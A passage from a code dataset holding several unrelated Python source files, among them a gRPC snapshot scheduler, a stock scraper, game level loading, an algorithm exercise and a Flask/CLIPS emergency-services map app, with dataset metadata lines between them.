context.abort(StatusCode.DEADLINE_EXCEEDED, \"Confirmation timeout\")\n except AuthException:\n context.abort(StatusCode.INVALID_ARGUMENT, \"Token is in use\")\n\n @log_request\n def ConfirmLogin(self, request, context):\n token = request.token\n openid = request.openid\n username = request.name\n\n try:\n self.auth.confirm_login(token, openid)\n except AuthException:\n context.abort(StatusCode.INVALID_ARGUMENT, \"Non-existing token\")\n\n with self.db_fn() as db:\n cnt = db.execute(\n \"SELECT COUNT(*) FROM users WHERE users.openid = ?\", (openid,)\n ).fetchone()[0]\n if cnt == 0:\n logging.info(f\"Creating new user: username={username}, openid={openid}\")\n db.execute(\"INSERT INTO users VALUES (?,?)\", (openid, username))\n return co.Empty()\n\n @requires_token\n @log_request\n def GetUserData(self, request, context):\n openid = context.openid\n\n with self.db_fn() as db:\n username = db.execute(\n \"SELECT name FROM users WHERE openid = ?\", (openid,)\n ).fetchone()[\"name\"]\n\n articles = []\n for row in db.execute(\n \"SELECT id, title, created_at FROM articles WHERE articles.user = ?\",\n (openid,),\n ):\n cnt = db.execute(\n \"SELECT COUNT(*) FROM snapshots WHERE snapshots.article = ?\",\n (row[\"id\"],),\n ).fetchone()[0]\n articles.append(\n co.Article(\n id=row[\"id\"],\n title=row[\"title\"],\n created_at=row[\"created_at\"],\n snapshot_count=cnt,\n )\n )\n\n notifications = []\n for r in db.execute(\n \"SELECT id, created_at, has_read, content, type FROM notifications WHERE user = ? ORDER BY created_at DESC\",\n (openid,),\n ):\n notifications.append(\n co.Notification(\n id=r[\"id\"],\n created_at=r[\"created_at\"],\n has_read=r[\"has_read\"],\n content=r[\"content\"],\n type=r[\"type\"],\n )\n )\n r = co.UserData(\n username=username, articles=articles, notifications=notifications\n )\n return r\n\n @requires_token\n @log_request\n def CreateArticle(self, request, context):\n openid = context.openid\n title = request.title\n\n _id = uuid()\n timestamp = unix_time()\n with self.db_fn() as db:\n db.execute(\n \"INSERT INTO articles VALUES (?,?,?,?)\", (_id, openid, timestamp, title)\n )\n return co.Article(id=_id, title=title, created_at=timestamp)\n\n @requires_token\n @log_request\n def DeleteArticle(self, request, context):\n openid = context.openid\n article_id = request.article_id\n\n with self.db_fn() as db:\n db.execute(\n \"DELETE FROM articles WHERE articles.id = ? AND articles.user = ?\",\n (article_id, openid),\n )\n return co.Empty()\n\n @requires_token\n @log_request\n def ChangeArticleTitle(self, request, context):\n openid = context.openid\n article_id = request.article_id\n title = request.title\n\n with self.db_fn() as db:\n db.execute(\n \"UPDATE articles SET title = ? WHERE articles.id = ? AND articles.user = ?\",\n (title, article_id, openid),\n )\n return co.Empty()\n\n @requires_token\n @log_request\n def RemoveSnapshotFromArticle(self, request, context):\n article_id = request.article_id\n snapshot_id = request.snapshot_id\n\n with self.db_fn() as db:\n db.execute(\n \"DELETE FROM snapshots WHERE snapshots.uuid = ? AND snapshots.article = ?\",\n (snapshot_id, article_id),\n )\n return co.Empty()\n\n @requires_token\n @log_request\n def GetArticleSnapshots(self, request, context):\n openid = context.openid\n article_id = request.article_id\n\n snapshots = []\n with self.db_fn() as db:\n for r in db.execute(\n \"SELECT uuid, url, timestamp FROM snapshots, articles WHERE snapshots.article = ?1 AND articles.id = ?1 AND articles.user = ?2\",\n (article_id, openid),\n ):\n snapshots.append(\n co.Snapshot(\n id=r[\"uuid\"],\n url=r[\"url\"],\n timestamp=r[\"timestamp\"],\n )\n )\n return sc.GetArticleSnapshotsResponse(snapshots=snapshots)\n\n def _add_notification(self, openid, msg, is_error):\n with self.db_fn() as db:\n params = {\n 'id': uuid(),\n 'user': openid,\n 'type': 1 if is_error else 0,\n 'created_at': unix_time(),\n 'has_read': 0,\n 'content': msg,\n }\n db.execute('INSERT INTO notifications VALUES ($id, $user, $type, $created_at, $has_read, $content)', params)\n\n @requires_token\n @log_request\n def Capture(self, request, context):\n openid = context.openid\n urls = list(set(request.urls))\n article_id = request.article_id\n\n worker = self.worker_stub()\n tasks = {} # url -> task_id\n with self.db_fn() as db:\n for url in urls:\n task_id = uuid()\n tasks[url] = task_id\n db.execute(\n \"INSERT INTO tasks VALUES (?,?,?,?)\",\n (task_id, openid, url, article_id),\n )\n\n def _async_action():\n successful_urls = set()\n for res in worker.Crawl(wo.CrawlRequest(urls=urls)):\n url = res.url\n task_id = tasks[url]\n content = res.content\n logging.info(f'Capture succeeded for {url} of type {content.type}')\n timestamp = unix_time()\n _id = uuid()\n ledger_key = ledger.add(content.hash)\n with self.db_fn() as db:\n # If the snapshot already exists(because this snapshot has multiple pieces of data attached), ignore.\n db.execute(\n \"INSERT OR IGNORE INTO snapshots VALUES (?,?,?,?,?,?)\",\n (_id, article_id, url, timestamp, False, None),\n )\n db.execute(\n \"INSERT INTO data VALUES (?,?,?,?,?)\",\n (_id, content.type, content.data.decode(), content.hash, ledger_key),\n )\n db.execute('DELETE FROM tasks WHERE id = ?', (task_id,))\n successful_urls.add(url)\n self.task_event.notify()\n # Worker hang up\n for url, task_id in tasks.items():\n if url not in successful_urls:\n logging.info(f'Capture failed for {url}')\n self._add_notification(openid, f\"拍摄快照失败:{url}\", is_error=True)\n with self.db_fn() as db:\n db.execute('DELETE FROM tasks WHERE id = ?', (task_id,))\n self.task_event.notify()\n\n threading.Thread(target=_async_action).start()\n self.task_event.notify()\n return co.Empty()\n\n def _get_current_tasks(self, openid):\n tasks = []\n with self.db_fn() as db:\n for r in db.execute(\n \"SELECT id, url, article_id FROM tasks WHERE user = ?\",\n (openid,),\n ):\n task = co.Task(\n id=r[\"id\"],\n url=r[\"url\"],\n article_id=r[\"article_id\"],\n )\n tasks.append(task)\n return sc.CurrentTasks(tasks=tasks)\n\n @requires_token\n @log_request\n def GetActiveTasks(self, request, context):\n openid = context.openid\n yield self._get_current_tasks(openid)\n sem = self.task_event.register()\n # Stream task list continuously, but disconnect if nothing changes for 5 minutes\n while sem.acquire(timeout=300):\n yield self._get_current_tasks(openid)\n self.task_event.unregister(sem)\n\n @requires_token\n @log_request\n def ClearTasks(self, req, ctx):\n with self.db_fn() as db:\n db.execute('DELETE FROM tasks WHERE user = ?', (ctx.openid,))\n return co.Empty()\n\n @requires_token\n @log_request\n def MarkAllAsRead(self, req, ctx):\n with self.db_fn() as db:\n db.execute('UPDATE notifications SET has_read = 1 WHERE user = ?', (ctx.openid,))\n return co.Empty()\n\n @log_request\n def GetSnapshot(self, request, context):\n snapshot_id = request.id\n\n # Check if snapshot is reported\n with self.db_fn() as db:\n r = db.execute('SELECT reported, report_reason FROM snapshots WHERE uuid = ?', (snapshot_id,)).fetchone()\n if r['reported'] > 0:\n context.abort(StatusCode.PERMISSION_DENIED, f\"Snapshot is reported: {r['report_reason']}\")\n\n with self.db_fn() as db:\n r = db.execute(\n \"SELECT type, access_url, ledger_key, hash FROM data WHERE snapshot = ?\", (snapshot_id,)\n )\n if r is None:\n context.abort(StatusCode.NOT_FOUND, \"Snapshot not found\")\n\n contents = []\n for datum in r:\n contents.append(co.Content(type=datum['type'], data=datum['access_url'].encode(), ledger_key=datum['ledger_key'], hash=datum['hash']))\n return sc.Contents(contents=contents)\n\n @log_request\n def ListSnapshots(self, request, context):\n url = request.url\n\n snapshots = []\n with self.db_fn() as db:\n for r in db.execute(\n \"SELECT uuid, url, timestamp FROM snapshots WHERE snapshots.url = ?\",\n (url,),\n ):\n snapshots.append(\n co.Snapshot(\n id=r[\"uuid\"],\n url=r[\"url\"],\n timestamp=r[\"timestamp\"],\n )\n )\n return sc.Snapshots(snapshots=snapshots)\n\n @log_request\n def Report(self, req, ctx):\n with self.db_fn() as db:\n db.execute('UPDATE snapshots SET reported = 1, report_reason = ? WHERE uuid = ?', (req.reason, req.snapshot_id))\n return co.Empty()\n\n @log_request\n def RegisterWorker(self, request, context):\n addr = request.addr\n port = request.port\n self.workers.add(f\"{addr}:{port}\")\n return co.Empty()\n\n\ndef serve(port=8000):\n server = grpc.server(ThreadPoolExecutor(max_workers=10))\n my_scheduler = MyScheduler(\n db_fn=lambda: open_db(Path(\"db/production\"), Path(\"db/schema\")),\n auth=Auth(),\n task_event=Event(),\n )\n add_SchedulerServicer_to_server(my_scheduler, server)\n server.add_insecure_port(f\"0.0.0.0:{port}\")\n server.start()\n logging.info(f\"Scheduler listening at 0.0.0.0:{port}\")\n server.wait_for_termination()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n port = os.getenv(\"SCHEDULER_PORT\", 8848)\n serve(port)\n","repo_name":"YizhePKU/Time-Capsule","sub_path":"scheduler/servicer.py","file_name":"servicer.py","file_ext":"py","file_size_in_byte":13658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5216195956","text":"from django.shortcuts import render\n\n# Create your views here.\nAPP_NAME = 'meditation'\nAPP_FULL_NAME = 'Breathing Meditation'\nICON_FILENAME = 'crucifix.svg'\n\ndef home(request):\n\n context = {\n 'app_full_name': APP_FULL_NAME,\n 'icon_filename': ICON_FILENAME\n }\n\n return render(request, 'meditation/home.html', context)\n","repo_name":"delperdang/lexcredendi","sub_path":"meditation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13923898189","text":"from custom_modules import messages as m\nfrom custom_modules import stock_data as s\nfrom custom_modules import finviz as f\nfrom custom_modules import more_stock_data as z\nfrom custom_modules import investors_hub as ih\nclass Scraper:\n def symbol_getter(self):\n self.symbol = input(\"Enter stock symbol: \")\n\n def scrape_yahoo(self):\n yahoo = s.YahooFinance(self.symbol)\n yahoo.build_url()\n yahoo.parser()\n yahoo.pull_table_data()\n\n\n def scrape_stock_twits(self):\n user = m.StockTwits(self.symbol)\n user.open_parser()\n user.find_element()\n user.display()\n\n def scrape_finviz(self):\n fin = f.FinViz(self.symbol)\n fin.build_url()\n fin.parser()\n fin.pull_table_data()\n\n def more_yahoo_finance(self):\n more = z.MoreYahooFinance(self.symbol)\n more.build_url()\n more.parser()\n more.pull_table_data()\n\n def investors_hub(self):\n stocks = ih.InvestorsHub()\n stocks.pull()\n stocks.filter_results()\n self.potential_stocks = stocks.results()\n print(self.potential_stocks)\n\n\n\nscraper = Scraper()\nscraper.investors_hub()\nprint(\" \", '\\n')\nscraper.symbol_getter()\nprint(\" \")\nscraper.scrape_yahoo()\nprint(\" \")\nscraper.more_yahoo_finance()\nprint(\" \")\nscraper.scrape_stock_twits()\nprint(\" \")\nscraper.scrape_finviz()\n","repo_name":"VLadio11/stock-scraper","sub_path":"general/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8229394148","text":"\r\n\"\"\" loading in of the level map\r\n\r\nsetup_world() : called in level_data\r\n putting all the levels into one list\r\n\r\nsetup_level() : called in level_data\r\n reads a level out of a file and puts them in a list\r\n\"\"\"\r\n\r\nlevel_map = []\r\n\r\ndef setup_world(l1,l2,l3,l4,l5,l6,l7,l8,l9,l0,l10):\r\n global level_map\r\n i = 0\r\n on = True\r\n one = False\r\n two = False\r\n while on:\r\n if one == False and two == False:\r\n level_top = l1[i] + l2[i] + l3[i]\r\n level_map.append(level_top)\r\n i += 1\r\n if i == 32:\r\n i = 0\r\n one = True\r\n elif one == True and two == False:\r\n level_mid = l4[i] + l5[i] + l6[i]\r\n level_map.append(level_mid)\r\n i += 1\r\n if i == 32:\r\n i = 0\r\n two = True\r\n elif one == True and two == True:\r\n level_bot = l7[i] + l8[i] + l9[i]\r\n level_map.append(level_bot)\r\n i += 1\r\n if i == 32:\r\n i = 0\r\n one =False\r\n elif one == False and two == True:\r\n level_bot2 = l0[i] + l0[i] + l10[i]\r\n level_map.append(level_bot2)\r\n i += 1\r\n if i == 32:\r\n on = False\r\n\r\ndef setup_level(level_name):\r\n level_file = open(\"../editor/\" + level_name + \".map\",\"r\")\r\n level = level_file.readlines()\r\n level_file.close()\r\n for i in range(0,32):\r\n level[i] = level[i].replace(\"\\n\", \"\")\r\n return level\r\n\r\nlevel_1 = setup_level(\"l1\")\r\nlevel_2 = setup_level(\"l2\")\r\nlevel_3 = setup_level(\"l3\")\r\nlevel_4 = setup_level(\"l6\")\r\nlevel_5 = setup_level(\"l5\")\r\nlevel_6 = setup_level(\"l4\")\r\nlevel_7 = setup_level(\"l7\")\r\nlevel_8 = setup_level(\"l8\")\r\nlevel_9 = setup_level(\"l9\")\r\nlevel_0 = setup_level(\"l0\")\r\nlevel_10= setup_level(\"l10\")\r\n\r\nsetup_world(\r\n level_1,level_2,level_3,\r\n level_4,level_5,level_6,\r\n level_7,level_8,level_9,\r\n level_0,level_10)","repo_name":"Uncrit/Eras-Adventure","sub_path":"code/level_data.py","file_name":"level_data.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26379886790","text":"import checkpointLogic as cpl\n\ncpl.cp0 = checkpt(0, 4, 17)\ncpl.cp1 = checkpt(1, 5, 6)\ncpl.cp2 = checkpt(2, 23, 24)\ncpl.cp3 = checkpt(3, 16, 20)\n\ncpl.cp0.assignPins()\ncpl.cp1.assignPins()\ncpl.cp2.assignPins()\ncpl.cp3.assignPins()\n\n\ni=0\nwhile(True):\n if cpl.checkpointReached(i % 4):\n print(i%4)\n i +=1","repo_name":"eidexe96/ITSRacetrack","sub_path":"DuplicatesAndTests/cpTest.py","file_name":"cpTest.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6760995773","text":"from sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.metrics import explained_variance_score, r2_score, mean_squared_error\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport numpy as np\n\n\ndef gbt_algorythm(X_train, y_train, X_test, y_test):\n\n model = GradientBoostingClassifier(n_estimators=20, random_state=42, learning_rate=0.1, max_depth=4)\n model.fit(X_train, y_train)\n\n y_pred = model.predict(X_test)\n\n variance_score = explained_variance_score(y_test, y_pred)\n print(\"Explained variance score Gradient boosted tree: %.2f%%\" % (variance_score * 100.0))\n\n r2 = r2_score(y_test, y_pred)\n print(\"R^2 score Gradient boosted tree: %.2f\" % r2)\n\n mean = mean_squared_error(y_test, y_pred)\n rmse = np.sqrt(mean)\n print(\"Root mean square error Gradient boosted tree: %.2f\" % rmse)\n\n print(\"Classification Report\")\n print(classification_report(y_test, y_pred))\n\n","repo_name":"jvukasin/SIAP","sub_path":"gradient_boosted_tree_alg.py","file_name":"gradient_boosted_tree_alg.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12543554371","text":"#!/usr/bin/env python3\n\nimport json\nimport argparse\nfrom typing import List, Dict, Tuple\nfrom lib import SvgStyle, SvgWriter, Polygon2D\n\n\nSVG_STYLE_VEC_BEFORE: Dict[str, str] = {\n \"fill-opacity\": \"1.0\",\n \"fill\": \"#7f007f\", # Purple\n \"stroke\": \"none\",\n}\nSVG_STYLE_POLY_BEFORE: Dict[str, str] = {\n \"fill-opacity\": \"0.0\",\n \"stroke\": \"#7f007f\", # Purple\n \"stroke-width\": \"0.25\",\n}\nSVG_STYLE_VEC_AFTER: Dict[str, str] = {\n \"fill-opacity\": \"1.0\",\n \"fill\": \"#007f7f\", # Teal\n \"stroke\": \"none\",\n}\nSVG_STYLE_POLY_AFTER: Dict[str, str] = {\n \"fill-opacity\": \"0.0\",\n \"stroke\": \"#007f7f\", # Teal\n \"stroke-width\": \"0.25\",\n}\n\n\ndef add_center_polygon_parser(subparsers: argparse._SubParsersAction) -> None:\n parser = subparsers.add_parser(\n \"center-polygon\",\n help=\"Given a polygon as a set up vertices, center it around the origin (0,0)\",\n )\n parser.add_argument(\"input_path\")\n parser.add_argument(\"output_path\")\n parser.add_argument(\"--debug-svg\", type=str, default=\"\")\n parser.set_defaults(func=center_polygon)\n\n\ndef center_polygon(args: argparse.Namespace) -> int:\n json_data: List[Tuple[float, float]] = []\n with open(args.input_path, \"r\") as f:\n json_data = json.loads(f.read())\n\n original_poly = Polygon2D.from_json(json_data)\n centered_poly = original_poly.centered()\n\n svg_writer = SvgWriter()\n svg_writer.append_element(original_poly, SvgStyle(SVG_STYLE_POLY_BEFORE))\n for v in original_poly.vertices:\n svg_writer.append_element(v, SvgStyle(SVG_STYLE_VEC_BEFORE))\n svg_writer.append_element(centered_poly, SvgStyle(SVG_STYLE_POLY_AFTER))\n for v in centered_poly.vertices:\n svg_writer.append_element(v, SvgStyle(SVG_STYLE_VEC_AFTER))\n if args.debug_svg != \"\":\n print('Writing debug svg to \"{}\"'.format(args.debug_svg))\n svg_writer.write_to_file(args.debug_svg)\n else:\n svg_writer.write_to_stdout()\n\n with open(args.output_path, \"w\") as f:\n f.write(json.dumps(centered_poly.to_json(), indent=4))\n\n return 0\n","repo_name":"cozykeys/resources","sub_path":"concepts/triad/scripts/commands/center_polygon.py","file_name":"center_polygon.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8206139092","text":"def minNumOfRooms(lectureTimes):\r\n if not lectureTimes:\r\n return 0\r\n\r\n # create a diction for start and end times\r\n startTimes = dict()\r\n endTimes = dict()\r\n\r\n # double for loop that adds start times to startTimes dictionary\r\n # and end times to endTimes dictionary\r\n for start, end in lectureTimes:\r\n if start not in startTimes:\r\n startTimes[start] = 0\r\n startTimes[start] += 1\r\n\r\n if end not in endTimes:\r\n endTimes[end] = 0\r\n endTimes[end] += 1\r\n\r\n # make global start and end times\r\n globalStart, globalEnd = min(startTimes), max(endTimes)\r\n\r\n maxClassCount = 0\r\n currClassCount = 0\r\n\r\n for i in range(globalStart, globalEnd):\r\n # if i in start times\r\n # then add current class count to start time\r\n if i in startTimes:\r\n currClassCount += startTimes[i]\r\n # and if current class count is greater tha max class count\r\n # then max is set equal to current\r\n if currClassCount > maxClassCount:\r\n maxClassCount = currClassCount\r\n\r\n # if i in end times\r\n # then add end times to current class count time\r\n if i in endTimes:\r\n currClassCount -= endTimes[i]\r\n\r\n return maxClassCount\r\n\r\n\r\n\r\n\r\nlectureTimes = [[30, 75], [0, 50], [60, 150]]\r\n\r\nprint(\"Number of rooms you'll need is\", minNumOfRooms(lectureTimes))\r\n","repo_name":"cgrant093/DCP","sub_path":"Days 21-30/20190609/DCP20190609.py","file_name":"DCP20190609.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29902231813","text":"import unittest\nfrom patterns.behavioral.chain_resposibility import Container, Leaf\n\n\nclass ChainOfResponsibility(unittest.TestCase):\n def test_should_handler_be_called_when_handle_is_called(self):\n was_called = False\n\n def testHandler():\n nonlocal was_called\n was_called = True\n child = Leaf(testHandler)\n child.handle()\n self.assertTrue(was_called)\n\n def test_should_call_parent_handler_when_no_handle_is_set_but_called(self):\n was_called = False\n\n def testHandler():\n nonlocal was_called\n was_called = True\n child = Leaf(None)\n parent = Container(testHandler)\n parent.add(child)\n child.handle()\n self.assertTrue(was_called)\n\n def test_should_call_the_higher_parent_handler_method_when_none_is_set(\n self):\n was_called = False\n\n def testHandler():\n nonlocal was_called\n was_called = True\n child = Leaf(None)\n lower_parent = Container(None)\n higher_parent = Container(testHandler)\n higher_parent.add(lower_parent)\n lower_parent.add(child)\n child.handle()\n self.assertTrue(was_called)\n","repo_name":"cruzortiz99/design-patterns","sub_path":"design-pattern-python/test/patterns/behavioral/chain_resposibility_test/__init__test.py","file_name":"__init__test.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19091331699","text":"# -*- coding: utf-8 -*-\n\n\nimport os\nimport math\nfrom PyQt5 import QtWidgets, QtCore, uic\nfrom pypipboy.types import eValueType\nfrom .. import widgets\nfrom pypipboy import inventoryutils\n\n\npowerArmorPaperDollSlots = [\n 'Body', # 0\n 'leftleg', # 1\n 'rightleg', # 2\n 'leftarm', # 3\n 'rightarm', # 4\n 'torso', # 5\n 'head', # 6\n 'head',#7\n 'head'#8\n ]\nclass PowerArmorInfoWidget(widgets.WidgetBase):\n _signalInfoUpdated = QtCore.pyqtSignal()\n \n def __init__(self, handle, controller, parent):\n super().__init__('Power Armor Info', parent)\n self.controller = controller\n self.widget = uic.loadUi(os.path.join(handle.basepath, 'ui', 'powerarmorinfowidget.ui'))\n self.setWidget(self.widget)\n self.pipPlayerInfo = None\n self._signalInfoUpdated.connect(self._slotInfoUpdated)\n self.paHP = {}\n for item in powerArmorPaperDollSlots:\n self.paHP[item + 'Max'] = 0\n\n\n\n def init(self, app, datamanager):\n super().init(app, datamanager)\n self.dataManager = datamanager\n self.dataManager.registerRootObjectListener(self._onPipRootObjectEvent)\n \n def _onPipRootObjectEvent(self, rootObject):\n self.pipInventoryInfo = rootObject.child('Inventory')\n if self.pipInventoryInfo:\n self.pipInventoryInfo.registerValueUpdatedListener(self._onPipInventoryInfoUpdate, 1)\n self._signalInfoUpdated.emit()\n\n\n def _onPipInventoryInfoUpdate(self, caller, value, pathObjs):\n self._signalInfoUpdated.emit()\n \n @QtCore.pyqtSlot()\n def _slotInfoUpdated(self):\n self.getPowerArmorItems()\n\n\n\n def getPowerArmorItems(self):\n equipedPA = []\n for item in powerArmorPaperDollSlots:\n self.paHP[item + 'Cur'] = 0\n\n if (self.pipInventoryInfo):\n def _filterFunc(item):\n return inventoryutils.itemHasAnyFilterCategory(item, inventoryutils.eItemFilterCategory.Apparel)\n\n power_armor = inventoryutils.inventoryGetItems(self.pipInventoryInfo, _filterFunc)\n for item in power_armor:\n\n if (item.child('isPowerArmorItem').value() and (item.child('equipState').value() == 1)):\n itemHealthTxt = inventoryutils.itemFindItemCardInfoValue(item, '$health')\n itemHealth = itemHealthTxt.split('/')\n itemTxt = item.child('text').value()\n\n i = 0\n paperDollLoc = None\n for section in item.child('PaperdollSection').value():\n if section.value():\n self.paHP[powerArmorPaperDollSlots[i] + 'Cur'] = int(itemHealth[0])\n self.paHP[powerArmorPaperDollSlots[i] + 'Max'] = int(itemHealth[1])\n maxHP = self.paHP[powerArmorPaperDollSlots[i] + 'Max']\n curHP = self.paHP[powerArmorPaperDollSlots[i] + 'Cur']\n percentHP = (curHP*100/maxHP)\n if itemTxt:\n self.widget.headItemLabel.setText(itemTxt)\n self.setWidgetValues(powerArmorPaperDollSlots[i],percentHP, itemHealthTxt,itemTxt)\n equipedPA.append(powerArmorPaperDollSlots[i])\n i+=1\n for item in powerArmorPaperDollSlots:\n if (not item in equipedPA and (not item == 'Body')):\n self.setWidgetValues(item,0, 'Empty',' ')\n\n def setWidgetValues(self, subwidget,value,text,itemName):\n methodToCall = getattr(self.widget,subwidget + 'Bar')\n methodToCall.setValue(value)\n methodToCall = getattr(self.widget,subwidget + 'Label')\n methodToCall.setText(text)\n methodToCall = getattr(self.widget,subwidget + 'ItemLabel')\n methodToCall.setText(itemName)\n\n\n","repo_name":"gwhittey23/powerarmorinfowidget","sub_path":"powerarmorinfowidget.py","file_name":"powerarmorinfowidget.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74686490348","text":"def len(arr,n):\n\tm=1\n\tl=1\n\tfor i in range(1,n):\n\t\tif arr[i] > arr[i-1]:\n\t\t\tl=l+1\n\t\telse:\n\t\t\tif m 0):\n n_cases -= 1\n burles = input().split(\" \")\n assert len(burles) == 2, \"Invalid input\"\n burles = [int(x) for x in burles]\n print(solve(burles[0], burles[1]))\n","repo_name":"discounter24/codeforces","sub_path":"1660A.py","file_name":"1660A.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33565490018","text":"from flask import Flask, render_template, request\nfrom flask_restful import Api\nfrom flask_googlemaps import GoogleMaps, Map\nfrom clips import Symbol, Environment\nfrom api.model.response import Success, Error\nfrom api.settings import GOOGLE_MAPS_TOKEN\nimport json\n\nenv = Environment()\n\nenv.load(\"expert_system.clp\")\nenv.reset()\n\nSERVICE_TEMPLATE = env.find_template('Service')\nEMERGENCY_TEMPLATE = env.find_template('Emergency')\n\nservice_count = 0\nemergency_count = 0\n\napp = Flask(\"CLIPS Map\", template_folder=\"templates\", static_folder=\"static\")\napi = Api(app)\nGoogleMaps(app, key=str(GOOGLE_MAPS_TOKEN))\n\nmy_map = Map(identifier=\"view-side\", lat=-15.42843, lng=28.12504)\n\n\n@app.route(\"/\")\ndef display_map():\n global service_count\n global emergency_count\n service_count = 0\n emergency_count = 0\n\n facts = []\n for i, fact in enumerate(env.facts()):\n if fact.template.name == 'Service' or fact.template.name == 'Emergency':\n facts.append(fact)\n for fact in facts:\n fact.retract()\n env.run()\n\n return render_template('index.html', mymap=my_map)\n\n\n@app.route(\"/addService\", methods=['POST'])\ndef add_service():\n global service_count\n service = SERVICE_TEMPLATE.new_fact()\n service[\"id\"] = service_count\n service[\"name\"] = Symbol(request.form.get(\"servicename\"))\n service[\"location\"] = [float(request.form.get(\"locx\")), float(request.form.get(\"locy\"))]\n service[\"n_members\"] = int(request.form.get(\"members\"))\n service[\"movement_speed\"] = float(request.form.get(\"speed\"))\n service[\"prep_time\"] = float(request.form.get(\"preptime\"))\n service.assertit()\n\n if service.asserted:\n service_count += 1\n env.run()\n data = {\"id\": service['id'], \"name\": service['name']}\n logs = get_current_responses()\n response = Success(callback=data, logs=logs, message=\"Emergency added successfully\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n response = Error(None, None, \"Service could not be added. Try again later.\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n\n@app.route(\"/addEmergency\", methods=['POST'])\ndef add_emergency():\n global emergency_count\n emergency = EMERGENCY_TEMPLATE.new_fact()\n emergency[\"id\"] = emergency_count\n emergency[\"type\"] = Symbol(request.form.get(\"emergencytype\"))\n emergency[\"location\"] = [float(request.form.get(\"locx\")), float(request.form.get(\"locy\"))]\n emergency[\"n_affected_people\"] = int(request.form.get(\"affected\"))\n emergency.assertit()\n\n if emergency.asserted:\n emergency_count += 1\n env.run()\n data = {\"id\": emergency['id'], \"type\": emergency['type']}\n logs = get_current_responses()\n response = Success(callback=data, logs=logs, message=\"Emergency added successfully\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n response = Error(None, None, \"Emergency could not be added. Try again later.\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n\n@app.route(\"/moveService\", methods=['POST'])\ndef move_service():\n fact_id = request.form.get(\"id\")\n loc_x = request.form.get(\"locx\")\n loc_y = request.form.get(\"locy\")\n\n for fact in env.facts():\n if fact.template.name == 'Service' and fact['id'] == int(fact_id):\n service = SERVICE_TEMPLATE.new_fact()\n service[\"id\"] = int(fact_id)\n service[\"name\"] = fact['name']\n service[\"location\"] = [float(loc_x), float(loc_y)]\n service[\"n_members\"] = int(fact['n_members'])\n service[\"movement_speed\"] = float(fact['movement_speed'])\n service[\"prep_time\"] = float(fact['prep_time'])\n\n service.assertit()\n\n fact.retract()\n\n if service.asserted:\n env.run()\n response = Success(None, None, \"Service re-allocated successfully!\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n response = Error(None, None, \"Service could not be re-allocated. Try again later.\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n\n@app.route(\"/moveEmergency\", methods=['POST'])\ndef move_emergency():\n fact_id = request.form.get(\"id\")\n loc_x = request.form.get(\"locx\")\n loc_y = request.form.get(\"locy\")\n\n for fact in env.facts():\n if fact.template.name == 'Emergency' and fact['id'] == int(fact_id):\n emergency = EMERGENCY_TEMPLATE.new_fact()\n emergency[\"id\"] = int(fact_id)\n emergency[\"type\"] = fact['type']\n emergency[\"location\"] = [float(loc_x), float(loc_y)]\n emergency[\"n_affected_people\"] = int(fact['n_affected_people'])\n\n emergency.assertit()\n\n fact.retract()\n\n if emergency.asserted:\n env.run()\n response = Success(None, None, \"Emergency re-allocated successfully!\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n response = Error(None, None, \"Emergency could not be re-allocated. Try again later.\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n\ndef get_current_responses():\n responses = []\n emergencies = []\n facts = []\n for i, fact in enumerate(env.facts()):\n print(fact)\n if fact.template.name == 'Solution':\n fact_data = dict()\n fact_data['code'] = fact['code_error']\n fact_data['id_emergency'] = fact['id_emergency']\n fact_data['id_service'] = fact['id_service']\n fact_data['service'] = fact['name_service']\n fact_data['emergency'] = fact['name_emergency']\n responses.append(fact_data)\n facts.append(fact)\n if fact['code_error'] >= 0:\n for j, e_fact in enumerate(env.facts()):\n if e_fact.template.name == 'Emergency' and e_fact['id'] == fact['id_emergency']:\n emergencies.append(e_fact)\n\n for fact in facts:\n fact.retract()\n for emergency in emergencies:\n emergency.retract()\n env.run()\n\n return responses\n\n\ndef is_error_response(response):\n return response['code'] < 0\n\n\nif __name__ == '__main__':\n 